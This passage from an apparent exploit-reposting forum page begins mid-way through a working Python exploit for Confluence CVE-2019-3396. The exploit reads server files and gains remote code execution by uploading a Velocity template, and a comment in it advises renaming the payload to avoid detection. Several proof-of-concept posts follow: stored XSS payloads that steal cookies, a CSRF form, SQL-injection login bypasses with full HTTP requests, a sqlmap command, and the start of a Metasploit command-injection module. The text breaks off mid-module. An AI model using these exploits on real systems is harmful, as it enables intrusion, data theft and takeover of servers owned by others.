traversal exploit: - not possible to distinguish between non-existent path and lack of permissions - no distinction between files and directories in the output If you have ability to authenticate to the server and have enough privileges to upload files use the second mode. A regular user probably has enough privileges for this since each user can have their own personal space where they should be able to add attachments. This exploit automatically finds the personal space, or creates one if it does not exists, a file with Velocity template payload. It then uses the original vulnerability but loads the template file with payload from local filesystem instead from remote system. Prerequisite of RCE in this exploit: - authenticated session is needed - knowledge of where attached files are stored on the file system - if it is not default location then use first mode to find it, should be in Confluence install directory under ./attachments subdirectory Usage - list /etc folder on Confluence server hosted on http://confluence.example.com python exploit.py -th confluence.example.com fs /etc - get content of /etc/passwd on same server but through a proxy python exploit.py -th confluence.example.com -px http://127.0.0.1:8080 fs /etc/passwd - execute 'whoami' command on the same server (this will upload a template file with payload to the server using existing session) python exploit.py -th confluence.example.com rce -c JSESSIONID=ABCDEF123456789ABCDEF123456789AB "whoami" Tested on Confluence versions: 6.12.1 To test the exploit: 1. Download Confluence trial version for version 6.12.1 https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin (to find this URL go to download page for the latest version, pick LTS release Linux 64 Bit, turn on the browser network tools to capture HTTP traffic, click Submit, take the URL from request towards 'product-downloads' and change the version in URL to be 6.12.1) SHA256: 679b1c05cf585b92af9888099c4a312edb2c4f9f4399cf1c1b716b03c114e9e6 atlassian-confluence-6.12.1-x64.bin 2. Run the binary to install it, for example on Ubuntu 20.04. Use "Express Install" and everything by default. chmod +x atlassian-confluence-6.12.1-x64.bin sudo ./atlassian-confluence-6.12.1-x64.bin 3. Open the browser to configure initial installation, when you get to license window copy the server ID. 4. Create account at https://my.atlassian.com/ and request for new trial license using server ID. 5. Activate the license and finish the installation with default options. 6. Create a user and login with him to go through initial user setup and get the session id for RCE part of the exploit. 7. Run the exploit (see usage above). """ __version__ = "1.0.0" __author__ = "46o60" import argparse import logging import requests import urllib3 from bs4 import BeautifulSoup import re import json import random import string # script and banner SCRIPT_NAME = "CVE-2019-3396: Confluence exploit script" ASCII_BANNER_TEXT = """____ ____ _ _ ____ _ _ _ ____ _ _ ____ ____ ____ | | | |\ | |___ | | | |___ |\ | | | | |__/ |___ |__| | \| | |___ |__| |___ | \| |___ |__| | \ """ # turn off requests log output urllib3.disable_warnings() logging.getLogger("urllib3").setLevel(logging.WARNING) def print_banner(): """ Prints script ASCII banner and basic information. Because it is cool. """ print(ASCII_BANNER_TEXT) print("{} v{}".format(SCRIPT_NAME, __version__)) print("Author: {}".format(__author__)) print() def exit_log(logger, message): """ Utility function to log exit message and finish the script. """ logger.error(message) exit(1) def check_cookie_format(value): """ Checks if value is in format: ^[^=]+=[^=]+$ """ pattern = r"^[^=]+=[^=]+$" if not re.match(pattern, value): raise argparse.ArgumentTypeError("provided cookie string does not have correct format") return value def parse_arguments(): """ Performs parsing of script arguments. """ # creating parser parser = argparse.ArgumentParser( prog=SCRIPT_NAME, description="Exploit CVE-2019-3396 to explore file system or gain RCE through file upload." ) # general script arguments parser.add_argument( "-V", "--version", help="displays the current version of the script", action="version", version="{name} {version}".format(name=SCRIPT_NAME, version=__version__) ) parser.add_argument( "-v", "--verbosity", help="increase output verbosity, two possible levels, no verbosity with default log output and debug verbosity", action="count", default=0 ) parser.add_argument( "-sb", "--skip-banner", help="skips printing of the banner", action="store_true", default=False ) parser.add_argument( "-s", "--silent", help="do not output results of the exploit to standard output", action="store_true", default=False ) parser.add_argument( "-q", "--quiet", help="do not output any logs", action="store_true", default=False ) # arguments for input parser.add_argument( "-px", "--proxy", help="proxy that should be used for the request, the same proxy will be used for HTTP and HTTPS" ) parser.add_argument( "-t", "--tls", help="use HTTPS protocol, default behaviour is to use plain HTTP", action="store_true" ) parser.add_argument( "-th", "--target-host", help="target hostname/domain", required=True ) parser.add_argument( "-p", "--port", help="port where the target is listening, default ports 80 for HTTP and 443 for HTTPS" ) # two different sub commands subparsers = parser.add_subparsers( title="actions", description="different behaviours of the script", help="for detail description of available action options invoke -h for each individual action", dest="action" ) # only exploring file system by disclosure of files and directories parser_file_system = subparsers.add_parser( "fs", help="use the exploit to browse local file system on the target endpoint" ) parser_file_system.add_argument( "path", help="target path that should be retrieved from the vulnerable server, can be path to a file or to a directory" ) parser_file_system.set_defaults(func=exploit_path_traversal) # using file upload to deploy payload and achieve RCE parser_rce = subparsers.add_parser( "rce", help="use the exploit to upload a template " ) parser_rce.add_argument( "-hd", "--home-directory", help="Confluence home directory on the server" ) parser_rce.add_argument( "-c", "--cookie", help="cookie that should be used for the session, value passed as it is in HTTP request, for example: " "-c JSESSIONID=ABCDEF123456789ABCDEF123456789AB", type=check_cookie_format, required=True ) parser_rce.add_argument( "command", help="target path that should be retrieved from the vulnerable server, can be path to a file or to a directory" ) parser_rce.set_defaults(func=exploit_rce) # parsing arguments = parser.parse_args() return arguments class Configuration: """ Represents all supported configuration items. """ # Parse arguments and set all configuration variables def __init__(self, script_args): self.script_arguments = script_args # setting input arguments self._proxy = self.script_arguments.proxy self._target_protocol = "https" if self.script_arguments.tls else "http" self._target_host = self.script_arguments.target_host self._target_port = self.script_arguments.port if self.script_arguments.port else \ 443 if self.script_arguments.tls else 80 @staticmethod def get_logger(verbosity): """ Prepares logger to output to stdout with appropriate verbosity. """ logger = logging.getLogger() # default logging level logger.setLevel(logging.DEBUG) # Definition of logging to console ch = logging.StreamHandler() # specific logging level for console if verbosity == 0: ch.setLevel(logging.INFO) elif verbosity > 0: ch.setLevel(logging.DEBUG) # formatting class MyFormatter(logging.Formatter): default_fmt = logging.Formatter('[?] %(message)s') info_fmt = logging.Formatter('[+] %(message)s') error_fmt = logging.Formatter('[-] %(message)s') warning_fmt = logging.Formatter('[!] %(message)s') debug_fmt = logging.Formatter('>>> %(message)s') def format(self, record): if record.levelno == logging.INFO: return self.info_fmt.format(record) elif record.levelno == logging.ERROR: return self.error_fmt.format(record) elif record.levelno == logging.WARNING: return self.warning_fmt.format(record) elif record.levelno == logging.DEBUG: return self.debug_fmt.format(record) else: return self.default_fmt.format(record) ch.setFormatter(MyFormatter()) # adding handler logger.addHandler(ch) return logger # Properties @property def endpoint(self): if not self._target_protocol or not self._target_host or not self._target_port: exit_log(log, "failed to generate endpoint URL") return f"{self._target_protocol}://{self._target_host}:{self._target_port}" @property def remote_path(self): return self.script_arguments.path @property def attachment_dir(self): home_dir = self.script_arguments.home_directory if self.script_arguments.home_directory else \ Exploit.DEFAULT_CONFLUENCE_INSTALL_DIR return f"{home_dir}{Exploit.DEFAULT_CONFLUENCE_ATTACHMENT_PATH}" @property def rce_command(self): return self.script_arguments.command @property def session_cookie(self): if not self.script_arguments.cookie: return None parts = self.script_arguments.cookie.split("=") return { parts[0]: parts[1] } @property def proxies(self): return { "http": self._proxy, "https": self._proxy } class Exploit: """ This class represents actual exploit towards the target Confluence server. """ # used for both path traversal and RCE DEFAULT_VULNERABLE_ENDPOINT = "/rest/tinymce/1/macro/preview" # used only for RCE CREATE_PERSONAL_SPACE_PATH = "/rest/create-dialog/1.0/space-blueprint/create-personal-space" PERSONAL_SPACE_KEY_PATH = "/index.action" PERSONAL_SPACE_KEY_REGEX = r"^/spaces/viewspace\.action\?key=(.*?)$" PERSONAL_SPACE_ID_PATH = "/rest/api/space" PERSONAL_SPACE_KEY_PARAMETER_NAME = "spaceKey" HOMEPAGE_REGEX = r"/rest/api/content/([0-9]+)$" ATL_TOKEN_PATH = "/pages/viewpageattachments.action" FILE_UPLOAD_PATH = "/pages/doattachfile.action" # file name has no real significance, file is identified on file system by it's ID # (change only if you want to avoid detection) DEFAULT_UPLOADED_FILE_NAME = "payload_{}.vm".format( ''.join(random.choice(string.ascii_lowercase) for i in range(5)) ) # the extension .vm is not really needed, remove it if you have problems uploading the template DEFAULT_CONFLUENCE_INSTALL_DIR = "/var/atlassian/application-data/confluence" DEFAULT_CONFLUENCE_ATTACHMENT_PATH = "/attachments/ver003" # using random name for uploaded file so it will always be first version of the file DEFAULT_FILE_VERSION = "1" def __init__(self, config): """ Runs the exploit towards target_url. """ self._config = config self._target_url = f"{self._config.endpoint}{Exploit.DEFAULT_VULNERABLE_ENDPOINT}" if self._config.script_arguments.action == "rce": self._root_url = f"{self._config.endpoint}/" self._create_personal_space_url = f"{self._config.endpoint}{Exploit.CREATE_PERSONAL_SPACE_PATH}" self._personal_space_key_url = f"{self._config.endpoint}{Exploit.PERSONAL_SPACE_KEY_PATH}" # Following data will be dynamically created while exploit is running self._space_key = None self._personal_space_id_url = None self._space_id = None self._homepage_id = None self._atl_token_url = None self._atl_token = None self._upload_url = None self._file_id = None def generate_payload_location(self): """ Generates location on file system for uploaded attachment based on Confluence Ver003 scheme. See more here: https://confluence.atlassian.com/doc/hierarchical-file-system-attachment-storage-704578486.html """ if not self._space_id or not self._homepage_id or not self._file_id: exit_log(log, "cannot generate payload location without space, homepage and file ID") space_folder_one = str(int(self._space_id[-3:]) % 250) space_folder_two = str(int(self._space_id[-6:-3]) % 250) space_folder_three = self._space_id page_folder_one = str(int(self._homepage_id[-3:]) % 250) page_folder_two = str(int(self._homepage_id[-6:-3]) % 250) page_folder_three = self._homepage_id file_folder = self._file_id version = Exploit.DEFAULT_FILE_VERSION payload_location = f"{self._config.attachment_dir}/" \ f"{space_folder_one}/{space_folder_two}/{space_folder_three}/"\ f"{page_folder_one}/{page_folder_two}/{page_folder_three}/" \ f"{file_folder}/{version}" log.debug(f"generated payload location: {payload_location}") return payload_location def path_traversal(self, target_remote_path, decode_output=False): """ Uses vulnerability in _template parameter to achieve path traversal. Args: target_remote_path (string): path on local file system of the target application decode_output (bool): set to True if output of the file will be character codes separated by new lines, used with RCE """ post_data = { "contentId": str(random.randint(1, 10000)), "macro": { "body": "", "name": "widget", "params": { "_template": f"file://{target_remote_path}", "url": "https://www.youtube.com/watch?v=" + ''.join(random.choice( string.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(11)) } } } log.info("sending request towards vulnerable endpoint with payload in '_template' parameter") response = requests.post( self._target_url, headers={ "Content-Type": "application/json; charset=utf-8" }, json=post_data, proxies=self._config.proxies, verify=False, allow_redirects=False ) # check if response was proper... if not response.status_code == 200: log.debug(f"response code: {response.status_code}") exit_log(log, "exploit failed") page_content = response.content # response is HTML soup = BeautifulSoup(page_content, features="html.parser") # if div element with class widget-error is returned, that means the exploit worked but it failed to retrieve # the requested path error_element = soup.find_all("div", "widget-error") if error_element: log.warning("failed to retrieve target path on the system") log.warning("target path does not exist or application does not have appropriate permissions to view it") return "" else: # otherwise parse out the actual response (file content or directory listing) output_element = soup.find_all("div", "wiki-content") if not output_element: exit_log(log, "application did not return appropriate HTML element") if not len(output_element) == 1: log.warning("application unexpectedly returned multiple HTML elements, using the first one") output_element = output_element[0] log.debug("extracting HTML element value and stripping the leading and trailing spaces") # output = output_element.string.strip() output = output_element.decode_contents().strip() if "The macro 'widget' is unknown. It may have been removed from the system." in output: exit_log(log, "widget seems to be disabled on system, target most likely is not vulnerable") if not self._config.script_arguments.silent: if decode_output: parsed_output = "" p = re.compile(r"^([0-9]+)") for line in output.split("\n"): r = p.match(line) if r: parsed_output += chr(int(r.group(1))) print(parsed_output.strip()) else: print(output) return output def find_personal_space_key(self): """ Makes request that will return personal space key in the response. """ log.debug("checking if user has personal space") response = requests.get( self._root_url, cookies=self._config.session_cookie, proxies=self._config.proxies, verify=False, ) page_content = response.text if "Add personal space" in page_content: log.info(f"user does not have personal space, creating it now...") response = requests.post( self._create_personal_space_url, headers={ "Content-Type": "application/json" }, cookies=self._config.session_cookie, proxies=self._config.proxies, verify=False, json={ "spaceUserKey": "" } ) if not response.status_code == 200: log.debug(f"response code: {response.status_code}") exit_log(log, "failed to create personal space") log.debug(f"personal space created") response_data = response.json() self._space_key = response_data.get("key") else: log.info("sending request to find personal space key") response = requests.get( self._personal_space_key_url, cookies=self._config.session_cookie, proxies=self._config.proxies, verify=False, allow_redirects=False ) # check if response was proper... if not response.status_code == 200: log.debug(f"response code: {response.status_code}") exit_log(log, "failed to get personal space key") page_content = response.content # response is HTML soup = BeautifulSoup(page_content, features="html.parser") personal_space_link_element = soup.find("a", id="view-personal-space-link") if not personal_space_link_element or not personal_space_link_element.has_attr("href"): exit_log(log, "failed to find personal space link in the response, does the user have personal space?") path = personal_space_link_element["href"] p = re.compile(Exploit.PERSONAL_SPACE_KEY_REGEX) r = p.match(path) if r: self._space_key = r.group(1) else: exit_log(log, "failed to find personal space key") log.debug(f"personal space key: {self._space_key}") self._personal_space_id_url = f"{self._config.endpoint}{Exploit.PERSONAL_SPACE_ID_PATH}?" \ f"{Exploit.PERSONAL_SPACE_KEY_PARAMETER_NAME}={self._space_key}" log.debug(f"generated personal space id url: {self._personal_space_id_url}") def find_personal_space_id_and_homepage_id(self): """ Makes request that will return personal space ID and homepage ID in the response. """ if self._personal_space_id_url is None: exit_log(log, f"personal space id url is missing, did you call exploit functions in correct order?") log.info("sending request to find personal space ID and homepage") response = requests.get( self._personal_space_id_url, cookies=self._config.session_cookie, proxies=self._config.proxies, verify=False, allow_redirects=False ) # check if response was proper... if not response.status_code == 200: log.debug(f"response code: {response.status_code}") exit_log(log, "failed to get personal space key") page_content = response.content # response is JSON data = json.loads(page_content) if "results" not in data: exit_log(log, "failed to find 'result' section in json output") items = data["results"] if type(items) is not list or len(items) == 0: exit_log(log, "no results for personal space id") personal_space_data = items[0] if "id" not in personal_space_data: exit_log(log, "failed to find ID in personal space data") self._space_id = str(personal_space_data["id"]) log.debug(f"found space id: {self._space_id}") if "_expandable" not in personal_space_data: exit_log(log, "failed to find '_expandable' section in personal space data") personal_space_expandable_data = personal_space_data["_expandable"] if "homepage" not in personal_space_expandable_data: exit_log(log, "failed to find homepage in personal space expandable data") homepage_path = personal_space_expandable_data["homepage"] p = re.compile(Exploit.HOMEPAGE_REGEX) r = p.match(homepage_path) if r: self._homepage_id = r.group(1) log.debug(f"found homepage id: {self._homepage_id}") self._atl_token_url = f"{self._config.endpoint}{Exploit.ATL_TOKEN_PATH}?pageId={self._homepage_id}" log.debug(f"generated atl token url: {self._atl_token_url}") self._upload_url = f"{self._config.endpoint}{Exploit.FILE_UPLOAD_PATH}?pageId={self._homepage_id}" log.debug(f"generated upload url: {self._upload_url}") else: exit_log(log, "failed to find homepage id, homepage path has incorrect format") def get_csrf_token(self): """ Makes request to get the current CSRF token for the session. """ if self._atl_token_url is None: exit_log(log, f"atl token url is missing, did you call exploit functions in correct order?") log.info("sending request to find CSRF token") response = requests.get( self._atl_token_url, cookies=self._config.session_cookie, proxies=self._config.proxies, verify=False, allow_redirects=False ) # check if response was proper... if not response.status_code == 200: log.debug(f"response code: {response.status_code}") exit_log(log, "failed to get personal space key") page_content = response.content # response is HTML soup = BeautifulSoup(page_content, features="html.parser") atl_token_element = soup.find("input", {"name": "atl_token"}) if not atl_token_element.has_attr("value"): exit_log(log, "failed to find value for atl_token") self._atl_token = atl_token_element["value"] log.debug(f"found CSRF token: {self._atl_token}") def upload_template(self): """ Makes multipart request to upload the template file to the server. """ log.info("uploading template to server") if not self._atl_token: exit_log(log, "cannot upload a file without CSRF token") if self._upload_url is None: exit_log(log, f"upload url is missing, did you call exploit functions in correct order?") # Velocity template here executes command and then captures the output. Here the output is generated by printing # character codes one by one in each line. This can be improved for sure but did not have time to investigate # why techniques from James Kettle's awesome research paper 'Server-Side Template Injection:RCE for the modern # webapp' was not working properly. This gets decoded on our python client later. template = f"""#set( $test = "test" ) #set($ex = $test.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("{self._config.script_arguments.command}")) #set($exout = $ex.waitFor()) #set($out = $ex.getInputStream()) #foreach($i in [1..$out.available()]) #set($ch = $out.read()) $ch #end""" log.debug(f"uploading template payload under name {Exploit.DEFAULT_UPLOADED_FILE_NAME}") parts = { "atl_token": (None, self._atl_token), "file_0": (Exploit.DEFAULT_UPLOADED_FILE_NAME, template), "confirm": "Attach" } response = requests.post( self._upload_url, cookies=self._config.session_cookie, proxies=self._config.proxies, verify=False, files=parts ) # for successful upload first a 302 response needs to happen then 200 page is returned with file ID if response.status_code == 403: exit_log(log, "got 403, probably problem with CSRF token") if not len(response.history) == 1 or not response.history[0].status_code == 302: exit_log(log, "failed to upload the payload") page_content = response.content if "Upload Failed" in str(page_content): exit_log(log, "failed to upload template") # response is HTML soup = BeautifulSoup(page_content, features="html.parser") file_link_element = soup.find("a", "filename", {"title": Exploit.DEFAULT_UPLOADED_FILE_NAME}) if not file_link_element.has_attr("data-linked-resource-id"): exit_log(log, "failed to find data-linked-resource-id attribute (file ID) for uploaded file link") self._file_id = file_link_element["data-linked-resource-id"] log.debug(f"found file ID: {self._file_id}") def exploit_path_traversal(config): """ This sends one request towards vulnerable server to either get local file content or directory listing. """ log.debug("running path traversal exploit") exploit = Exploit(config) exploit.path_traversal(config.remote_path) def exploit_rce(config): """This executes multiple steps to gain RCE. Requires a session token. Steps: 1. find personal space key for the user 2. find personal space ID and homepage ID for the user 3. get CSRF token (generated per session) 4. upload template file with Java code (involves two requests, first one is 302 redirection) 5. use path traversal part of exploit to load and execute local template file 6. profit """ log.debug("running RCE exploit") exploit = Exploit(config) exploit.find_personal_space_key() exploit.find_personal_space_id_and_homepage_id() exploit.get_csrf_token() exploit.upload_template() payload_location = exploit.generate_payload_location() exploit.path_traversal(payload_location, decode_output=True) if __name__ == "__main__": # parse arguments and load all configuration items script_arguments = parse_arguments() log = Configuration.get_logger(script_arguments.verbosity) configuration = Configuration(script_arguments) # printing banner if not configuration.script_arguments.skip_banner: print_banner() if script_arguments.quiet: log.disabled = True log.debug("finished parsing CLI arguments") log.debug("configuration was loaded successfully") log.debug("starting exploit") # disabling warning about trusting self sign certificate from python requests urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # run appropriate function depending on mode configuration.script_arguments.func(configuration) log.debug("done!")
  18. ISHACK AI BOT

    MyBB Timeline Plugin 1.0 - Persistent Cross-Site Scripting

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF # Date: 1/21/2021 # Author: 0xB9 # Software Link: https://community.mybb.com/mods.php?action=view&pid=1428 # Version: 1.0 # Tested on: Windows 10 1. Description: MyBB Timeline replaces the default MyBB user profile. This introduces cross-site scripting on user profiles & a CSRF that allows for the users timeline banner/image to be changed. 2. Proof of Concept: ~ XSS via Thread/Post ~ - Make a new thread or reply to an existing thread - Input a payload in either the thread title or main post itself <script>alert('XSS')</script> Payload will execute when visiting your profile. ~ XSS via Location/Bio ~ - Go to User CP -> Edit Profile - Input a payload in the Location/Bio <script>alert('XSS')</script> Payload will execute when visiting your profile. ~ CSRF ~ <form class="coverpicForm" action="http://localhost/mybb/timeline.php?action=profile&uid=1" style="display: block;"> <input type="text" name="coverpic" placeholder="Add Image URL" required=""> <input type="hidden" name="do_coverpic" value="change"> <input type="submit" value="Change"> </form>
  19. ISHACK AI BOT

    Collabtive 3.1 - 'address' Persistent Cross-Site Scripting

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Collabtive 3.1 - 'address' Persistent Cross-Site Scripting # Date: 2021-01-23 # Exploit Author: Deha Berkin Bir # Vendor Homepage: https://collabtive.o-dyn.de/ # Version: 3.1 # Tested on: Windows & XAMPP # CVE: CVE-2021-3298 ==> Tutorial <== 1- Login to your account. 2- Go to the profile edit page and write your XSS/HTML payload into "Address" section. - You will see the executed HTML payload at there. (HTML Injection) - You will see the executed XSS payload at profile edit section. (XSS) ==> Executed Payloads <== XSS Payload ==> " onfocus="alert(1)" autofocus=" HTML Payload ==> <h1>DehaBerkinBir</h1> ==> HTTP Request <== POST /manageuser.php?action=edit HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://(HOST)/manageuser.php?action=editform&id=1 Content-Type: multipart/form-data; boundary=---------------------------12097618915709137911841560297 Content-Length: 2327 Connection: close Cookie: activeSlideIndex=0; PHPSESSID=oj123o7asdfasdfu4pts2g Upgrade-Insecure-Requests: 1 -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="name" admin -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="userfile"; filename="" Content-Type: application/octet-stream -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="file-avatar" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="company" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="email" [email protected] -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="web" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="tel1" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="tel2" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="address1" " onfocus="alert(1)" autofocus=" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="zip" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="address2" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="country" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="state" admin -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="gender" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="locale" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="admin" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="oldpass" admin -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="newpass" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="repeatpass" -----------------------------12097618915709137911841560297--
  20. ISHACK AI BOT

    Library System 1.0 - 'category' SQL Injection

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Library System 1.0 - 'category' SQL Injection # Exploit Author: Aitor Herrero # Date: 2021-01-22 # Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html # Software Link: https://www.sourcecodester.com/php/12275/library-system-using-php.html # Version: 1.0 # Tested On: Windows 10 + XAMPP 7.4.4 # Description: Library System 1.0 #STEP 1 : Go to the principal main #STEP 2 : Choose a category example :http://localhost:8080/libsystem/libsystem/index.php?category=3 #STEP 3: Run your sqlmap example: sqlmap -u "http://localhost:8080/libsystem/libsystem/index.php?category=3" --dbs
  21. ISHACK AI BOT

    CASAP Automated Enrollment System 1.0 - 'route' Stored XSS

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: CASAP Automated Enrollment System 1.0 - 'route' Stored XSS # Exploit Author: Richard Jones # Date: 2021-01/23 # Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 # Steps to reproduce # 1. login bypass username: admin, password: `' or 1=1# # 2. Studants > Edit > "ROUTE" field enter.. "<script>alert(document.cookie)</script> # Save, reload page, exploited stored XXS POST /Final/update_student.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 297 Origin: http://TARGET Connection: close Referer: http://TARGET/Final/edit_stud.php?id=6 Cookie: PHPSESSID=97qoeda9h6djjis5gbr00p7ndc student_id=6&status=half&fname=Ronel&mname=G.&lname=Ortega&gender=Male&dob=1999-06-16&address=Prk.1+brgy.banago+bacolod+city&student_class=ICT+-+Computer+Programming&transport=yes&route=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&gfname=Juanita&gmname=S.&glname=a&rship=Mother&tel=0912312445
  22. ISHACK AI BOT

    CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS # Exploit Author: Anita Gaud # Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1 # Tested on Windows # CVE: CVE-2021-3294 *XSS IMPACT:* 1: Steal the cookie 2: User redirection to a malicious website Vulnerable Parameters: First Name *Steps to reproduce:* 1: Log in with a valid username and password. Navigate to the Users tab (http://localhost/Final/Final/users.php) on the left-hand side. 2: Add the new user and then add the payload <script>alert(document.cookie)</script>in First Name parameter and click on save button. Post Saved successfully. 3: Now, XSS will get stored and trigger every time and the attacker can steal authenticated users' cookies.
  23. ISHACK AI BOT

    Simple College Website 1.0 - 'name' Sql Injection (Authentication Bypass)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Simple College Website 1.0 - 'name' Sql Injection (Authentication Bypass) # Exploit Author: Marco Catalano (@stunn4) # Date: 2021-01-25 # Vendor Homepage: https://www.sourcecodester.com/php/7772/simple-college-website-using-php-and-mysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=7772&title=Simple+College+Website+using++PHP%2FMySQLi+with+Source+Code # Affected Version: 1.0 # Vulnerable parameter: "name" (POST method) # Tested on: Linux, PHP/7.4.11 Explaination: The source of "/admin_pages/login.php" file defines the following lines of code: $name=$_POST['name']; $password=$_POST['password']; $result=mysqli_query($conn,"SELECT * FROM users WHERE name='$name' AND Password='$password'"); which are called when trying to log into the administrative panel at "/admin_pages/login.php" itself. Proof Of Concept: The user input is not properly sanitized and this leads to authentication bypass through the classic "<username>' or '1' = '1 -- -" where <username> has to be a valid username. For example, the default username is "florian". POST /admin_pages/login.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 66 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/admin_pages/login.php Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj Upgrade-Insecure-Requests: 1 name=florian%27+or+%271%27+%3D+%271+--+-&password=test&login=Login
  24. ISHACK AI BOT

    Cemetry Mapping and Information System 1.0 - 'user_email' Sql Injection (Authentication Bypass)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Cemetry Mapping and Information System 1.0 - 'user_email' Sql Injection (Authentication Bypass) # Exploit Author: Marco Catalano # Date: 2021-01-25 # Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code # Affected Version: 1.0 # Vulnerable parameter: "user_email" (POST method) # Tested on: Linux, PHP/7.4.11 Explaination: The userAuthentication function defined in "/include/accounts.php" implements the following code: $mydb->setQuery("SELECT * FROM `tbluseraccount` WHERE `U_USERNAME` = '". $U_USERNAME ."' and `U_PASS` = '". $h_pass ."'"); which is called when trying to log into the administrative panel at "/admin/login.php". Proof Of Concept: The user input is not properly sanitized and this leads to authentication bypass through the classic "<username>' or '1' = '1 -- -" where <username> has to be a valid username. For example, the default username is "janobe". POST /admin/login.php?logout=1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 69 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/admin/login.php?logout=1 Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj Upgrade-Insecure-Requests: 1 user_email=janobe%27+or+%271%27+%3D+%271--+-&user_pass=test&btnLogin=
  25. ISHACK AI BOT

    Klog Server 2.4.1 - Unauthenticated Command Injection (Metasploit)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info={}) super(update_info(info, 'Name' => 'Klog Server Unauthenticated Command Injection Vulnerability', 'Description' => %q{ This module exploits an unauthenticated command injection vulnerability in Klog Server <= 2.4.1. "user" parameter is executed via shell_exec() function without input validation. }, 'License' => MSF_LICENSE, 'Author' => [ 'B3KC4T', # Vulnerability discovery 'Metin Yunus Kandemir', # Metasploit module ], 'References' => [ ['CVE', '2020-35729'], ['URL', 'https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection'] ], 'DefaultOptions' => { 'HttpClientTimeout' => 2, }, 'Platform' => [ 'unix', 'linux' ], 'Arch' => [ ARCH_X64 ], 'Targets' => [ ['Klog Server 2.4.1 (x64)', { 'Platform' => 'linux', 'Arch' => ARCH_X64, }], ], 'Privileged' => false, 'DisclosureDate' => "2021-01-05", 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), 